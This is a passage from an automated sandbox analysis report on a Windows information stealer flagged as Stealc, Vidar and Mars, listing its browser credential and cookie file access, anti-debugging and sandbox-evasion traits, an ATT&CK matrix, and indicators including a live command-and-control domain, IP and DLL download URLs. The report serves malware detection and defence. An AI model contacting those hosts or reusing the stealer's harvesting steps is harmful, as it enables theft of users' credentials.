                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                      Source: DBFIDGII.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                      Source: DBFIDGII.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                      Source: DBFIDGII.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                      Source: DBFIDGII.0.drBinary or memory string: discord.comVMware20,11696487552f
                      Source: DBFIDGII.0.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                      Source: DBFIDGII.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: DBFIDGII.0.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                      Source: DBFIDGII.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                      Source: DBFIDGII.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                      Source: DBFIDGII.0.drBinary or memory string: global block list test formVMware20,11696487552
                      Source: DBFIDGII.0.drBinary or memory string: tasks.office.comVMware20,11696487552o
                      Source: DBFIDGII.0.drBinary or memory string: AMC password management pageVMware20,11696487552
                      Source: DBFIDGII.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                      Source: DBFIDGII.0.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                      Source: DBFIDGII.0.drBinary or memory string: dev.azure.comVMware20,11696487552j
                      Source: DBFIDGII.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                      Source: DBFIDGII.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                      Source: DBFIDGII.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`w
                      Source: DBFIDGII.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware^
                      Source: DBFIDGII.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                      Source: DBFIDGII.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                      Source: DBFIDGII.0.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                      Source: DBFIDGII.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: DBFIDGII.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                      Source: DBFIDGII.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                      Source: DBFIDGII.0.drBinary or memory string: outlook.office.comVMware20,11696487552s
                      Source: DBFIDGII.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                      Source: DBFIDGII.0.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                      Source: DBFIDGII.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                      Source: DBFIDGII.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                      Source: DBFIDGII.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00416230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00415DB0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C37B13 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD6017 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FC0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FC092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00419DB7 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_004173CD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD7634 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FDA01E SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD7DA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Searches for specific processes (likely to inject)
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00415CF0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD5F57 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_004143B0 GetProcessHeap,HeapAlloc,GetUserNameA,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_004144A0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Mars stealer
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Stealc
                      Source: Yara matchFile source: 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: Yara matchFile source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Mars stealer
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Stealc
                      Source: Yara matchFile source: 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E1307A sqlite3_transfer_bindings,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D5E6 sqlite3_bind_int64,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D595 sqlite3_bind_double,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E0B431 sqlite3_clear_bindings,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E037F3 sqlite3_value_frombind,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D781 sqlite3_bind_zeroblob64,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D714 sqlite3_bind_zeroblob,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D68C sqlite3_bind_pointer,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D65B sqlite3_bind_null,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D635 sqlite3_bind_int,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D9B0 sqlite3_bind_value,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D981 sqlite3_bind_text16,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D945 sqlite3_bind_text64,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D916 sqlite3_bind_text,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D8E7 sqlite3_bind_blob64,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E038CA sqlite3_bind_parameter_count,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E158CA sqlite3_bind_parameter_index,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E038DC sqlite3_bind_parameter_name,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E2D8B8 sqlite3_bind_blob,

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading                      		1
                      Virtualization/Sandbox Evasion                      		LSASS Memory21
                      Security Software Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		12
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      Process Injection                      		Security Account Manager1
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Deobfuscate/Decode Files or Information                      		NTDS11
                      Process Discovery                      		Distributed Component Object ModelInput Capture113
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Obfuscated Files or Information                      		LSA Secrets1
                      Account Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Software Packing                      		Cached Domain Credentials1
                      System Owner/User Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading                      		DCSync2
                      File and Directory Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem133
                      System Information Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      FFAk2gixx5.exe71%ReversingLabsWin32.Trojan.Stealc
                      FFAk2gixx5.exe68%VirustotalBrowse
                      FFAk2gixx5.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\ProgramData\freebl3.dll0%ReversingLabs
                      C:\ProgramData\mozglue.dll0%ReversingLabs
                      C:\ProgramData\msvcp140.dll0%ReversingLabs
                      C:\ProgramData\nss3.dll0%ReversingLabs
                      C:\ProgramData\softokn3.dll0%ReversingLabs
                      C:\ProgramData\vcruntime140.dll5%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll5%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      okkolus.com11%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://mozilla.org0/0%URL Reputationsafe
                      https://ac.ecopnacl0%URL Reputationsafe
                      https://ac.ecop0%URL Reputationsafe
                      http://okkolus.com/dfaf16606234b71d/nss3.dllll0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/vcruntime140.dllata0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/msvcp140.dlluPh0%Avira URL Cloudsafe
                      http://okkolus.com0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/msvcp140.dll.0%Avira URL Cloudsafe
                      http://okkolus.com11%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/softokn3.dll0%Avira URL Cloudsafe
                      http://okkolus.com/cf5cbdf706840b3f.0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/nss3.dll.U0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/mozglue.dllrowser0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/nss3.dllll1%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/mozglue.dll0%Avira URL Cloudsafe
                      http://okkolus.com/cf5cbdf706840b3f.php&)0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/mozglue.dll94eaf2a9d1d275a40e443fa5Extension0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/mozglue.dllVUG0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/softokn3.dll1%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/nss3.dllpatible_edge_version_number0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/softokn3.dller0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/nss3.dlle0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/freebl3.dll0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/mozglue.dll3%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/vcruntime140.dll0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/ra0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/msvcp140.dller0%Avira URL Cloudsafe
                      http://okkolus.com/cf5cbdf706840b3f.phpN0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/freebl3.dll3%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/0%Avira URL Cloudsafe
                      http://okkolus.com/cf5cbdf706840b3f.phpte3.dll0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/vcruntime140.dll1%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/softokn3.dll.0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/1%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/softokn3.dllCSF0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/nss3.dllll_TH0%Avira URL Cloudsafe
                      http://okkolus.com/cf5cbdf706840b3f.phpte3.dll4%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/freebl3.dll94eaf2a9d1d275a40e443fa5tionComponent0%Avira URL Cloudsafe
                      http://okkolus.com/cf5cbdf706840b3f.phpN4%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/oTab0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/mozglue.dllser0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/soft0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/softokn3.dller1%VirustotalBrowse
                      http://okkolus.com/cf5cbdf706840b3f.php100%Avira URL Cloudmalware
                      http://okkolus.com/cf5cbdf706840b3f.php6c3c10c894eaf2a9d1d275a40e443fa5cations0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/vcruntime140.dll%0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/nss3.dll9M0%Avira URL Cloudsafe
                      http://okkolus.comppData0%Avira URL Cloudsafe
                      http://okkolus.com/cf5cbdf706840b3f.php13%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/msvcp140.dll0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/sqlite3.dll0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/nss3.dlle5%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/nss3.dll0%Avira URL Cloudsafe
                      http://okkolus.com/cf5cbdf706840b3f.php/M100%Avira URL Cloudmalware
                      http://okkolus.com/cf5cbdf706840b3f.phpt0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/nss3.dllJT0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/nss3.dlloU0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/nss3.dll3%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/mozglue.dlld0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/nss3.dllllx0%Avira URL Cloudsafe
                      http://okkolus.com/dfaf16606234b71d/sqlite3.dll4%VirustotalBrowse
                      http://okkolus.com/dfaf16606234b71d/msvcp140.dll3%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      okkolus.com
                      		31.41.44.147
                      		truetrueunknown

                      Contacted URLs

